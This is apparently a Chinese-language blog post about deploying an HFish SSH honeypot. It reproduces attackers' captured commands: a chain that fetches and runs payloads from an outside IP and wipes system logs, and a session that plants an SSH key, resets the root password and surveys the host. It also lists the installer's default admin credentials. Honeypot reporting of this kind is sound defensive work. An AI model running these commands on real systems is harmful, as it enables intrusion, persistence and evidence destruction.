每次新開伺服器,就會被來自江蘇連雲港和其他海外 IP 的 ssh 弱口令爆破,我很想知道這些人登錄成功我的伺服器後會執行哪些操作,於是我搭建了一個 hfish 蜜罐接收了他們的攻擊!
搭建教程:#
官方部署教程:https://hfish.net/#/2-2-linux
CentOS 是 HFish 團隊主力開發和測試系統,推薦選用 CentOS 系統部署管理端
如果部署的環境為 Linux,且可以訪問互聯網,強烈建議使用一鍵部署腳本進行安裝和配置,在使用一鍵腳本前,請先配置防火牆。
如果蜜罐節點暴露在互聯網,可能會出現 TCP 連接超過最大 1024 個連接數限制,導致其他連接被拒絕的情況,可手動放開機器 TCP 最大連接數。參考解決鏈接:https://www.cnblogs.com/lemon-flm/p/7975812.html
以 root 權限運行以下命令,確保配置防火牆開啟 TCP/4433、TCP/4434
firewall-cmd --add-port=4433/tcp --permanent #(用於web界面啟動)
firewall-cmd --add-port=4434/tcp --permanent #(用於節點與管理端通信)
firewall-cmd --reload
如之後蜜罐服務需要佔用其他端口,可使用相同命令打開
以 root 權限運行以下一鍵部署命令
bash <(curl -sS -L https://hfish.net/webinstall.sh)
完成安裝後,通過以下網址、賬號密碼登錄
登錄鏈接:https://[ip]:4433/web/
賬號:admin
密碼:HFish2021
我的蜜罐:#
我這裡使用了高交互 SSH 蜜罐,這裡比普通的 ssh 蜜罐不同的點就是交互功能豐富一點,執行的命令也多。並且任何密碼都能登錄成功。
其中我捕獲到了一個海外 IP 的 ssh 執行命令,其他的暫時沒有捕獲成功!
New connection: 167.88.165.28:35180 (*****:22) [session: a58f59899b0d]
Remote SSH version: SSH-2.0-PUTTY
login attempt [root/123456a] succeeded
wdir="/bin"; for i in "/bin" "/home" "/root" "/tmp" "/usr" "/etc"; do; if [ -w $i ]; then; wdir=$i; break; fi; done; cd $wdir; curl http://169.239.130.34/1.txt -o ygljglkjgfg0; chmod +x ygljglkjgfg0; ./ygljglkjgfg0; wget http://169.239.130.34/1.txt -O ygljglkjgfg1; chmod +x ygljglkjgfg1; ./ygljglkjgfg1; good http://169.239.130.34/1.txt -O ygljglkjgfg2; chmod +x ygljglkjgfg2; ./ygljglkjgfg2; sleep 2; wget http://169.239.130.34/2.txt -O sdf3fslsdf13; chmod +x sdf3fslsdf13; ./sdf3fslsdf13; good http://169.239.130.34/2.txt -O sdf3fslsdf14; chmod +x sdf3fslsdf14; ./sdf3fslsdf14; curl http://169.239.130.34/2.txt -o sdf3fslsdf15; chmod +x sdf3fslsdf15; ./sdf3fslsdf15; sleep 2; mv /usr/bin/wget /usr/bin/good; mv /bin/wget /bin/good; cat /dev/null >/root/.bash_history; cat /dev/null > /var/log/wtmp; cat /dev/null > /var/log/btmp; cat /dev/null > /var/log/lastlog; cat /dev/null > /var/log/secure; cat /dev/null > /var/log/boot.log; cat /dev/null > /var/log/cron; cat /dev/null > /var/log/dmesg; cat /dev/null > /var/log/firewalld; cat /dev/null > /var/log/maillog; cat /dev/null > /var/log/messages; cat /dev/null > /var/log/spooler; cat /dev/null > /var/log/syslog; cat /dev/null > /var/log/tallylog; cat /dev/null > /var/log/yum.log; cat /dev/null >/root/.bash_history; ls -la /etc/daemon.cfg; exit $?; ; ;
ls -la /etc/daemon.cfg
Connection lost after 10 seconds
我最想捕獲來自江蘇連雲港的執行操作,因為這個 IP 地區段一直在執行 ssh 弱口令爆破,在半年前我就發現了。後期捕獲成功我再來添加後續!
後續:#
收到了來自 IP:31.46.16.122 的攻擊,通過 ssh 蜜罐執行了下面的命令:
cd ~; chattr -ia .ssh; lockr -ia .ssh
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
cat /proc/cpuinfo | grep name | wc -l
echo "root:vfQmZqwSSWnP"|chpasswd|bash
rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
ls -lh $(which ls)
which ls
crontab -l
w
uname -m
cat /proc/cpuinfo | grep model | grep name | wc -l
top
uname
uname -a
whoami
lscpu | grep Model
df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
這些命令都是用來獲取系統信息或執行系統操作的。讓我們逐個來解釋:
-
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~這個命令的作用是:
- 切換到用戶的主目錄 (
cd ~)。 - 刪除
.ssh目錄及其內容 (rm -rf .ssh)。 - 創建一個新的
.ssh目錄 (mkdir .ssh)。 - 將一個 SSH 公鑰添加到
.ssh目錄下的authorized_keys文件中。 - 限制
.ssh目錄及其內容的權限,使其只對所有者可讀可寫 (chmod -R go= ~/.ssh)。 - 切換回用戶的主目錄 (
cd ~)。
- 切換到用戶的主目錄 (
-
cat /proc/cpuinfo | grep name | wc -l這個命令的作用是獲取 CPU 信息並統計 CPU 名稱的數量。
-
echo "root:vfQmZqwSSWnP" | chpasswd | bash這個命令的作用是將 root 用戶的密碼設置為
vfQmZqwSSWnP。 -
rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;這個命令的作用是刪除
/tmp目錄下的secure.sh和auth.sh文件,然後終止名為secure.sh和auth.sh的進程,清空/etc/hosts.deny文件內容,並終止所有名為sleep的進程。 -
cat /proc/cpuinfo | grep model | grep name | wc -l這個命令的作用是獲取 CPU 信息並統計 CPU 模型名稱的數量。
-
top這個命令的作用是顯示系統中當前運行的進程信息,包括 CPU 占用情況等。
-
uname這個命令的作用是顯示系統信息,如內核名稱。
-
uname -a這個命令的作用是顯示完整的系統信息,包括內核版本、主機名、操作系統版本等。
-
whoami這個命令的作用是顯示當前登錄用戶的用戶名。
-
lscpu | grep Model這個命令的作用是顯示 CPU 的型號信息。
-
df -h | head -n 2 | awk 'FNR == 2 {print $2;}'這個命令的作用是顯示磁碟空間使用情況,具體來說是顯示根目錄的總空間。
搞不懂這個二貨給我加了個 ssh 密鑰還給我把 root 密碼改了,後續繼續監控!